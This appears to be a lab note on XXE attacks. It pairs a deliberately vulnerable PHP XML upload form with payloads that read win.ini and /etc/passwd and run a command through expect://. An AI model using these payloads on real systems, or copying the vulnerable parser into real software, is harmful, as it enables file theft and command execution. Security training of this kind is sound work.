Prepare
Lab
- Linux kali 3.14-kali1-686-pae
Requments
Demo Code
- <html>
- <body>
- <h1>Process XML</h1>
-
- <form action="" method="post" enctype="multipart/form-data">
- <label for="file">Archive XML:</label>
- <input type="file" name="file" id="file">
- <input type="submit" name="submit" value="submit"><br />
- </form>
- <hr>
- <h1>Results</h1>
- <?PHP # error_reporting(E_ALL); # ini_set("display_errors",1); if ( isset($_FILES["file"]) ) { $doc = new DOMDocument(); $doc->validateOnParse = true; $doc->Load($_FILES["file"]["tmp_name"]); $tags = $doc->getElementsByTagName("data"); foreach($tags as $tag) { echo "<pre>" . $tag->nodeValue . "</pre>\n"; } } else { echo "invalid xml format"; } ?>
-
- </body>
- </html>
Exploit
Windows
File Inclusion
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
- <xxx>&message;</xxx>
Source Disclosure
Linux
File Inclusion
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
- <somexml><message>&hello;</message></somexml>
Source Disclosure
Command Execution
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
- <somexml><message>&hello;</message></somexml>
References
- https://pentesterlab.com/exercises/play_xxe
- http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
- http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html
- http://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
- http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
- http://stackoverflow.com/questions/24117700/clarifications-on-xxe-vulnerabilities-throughout-php-versions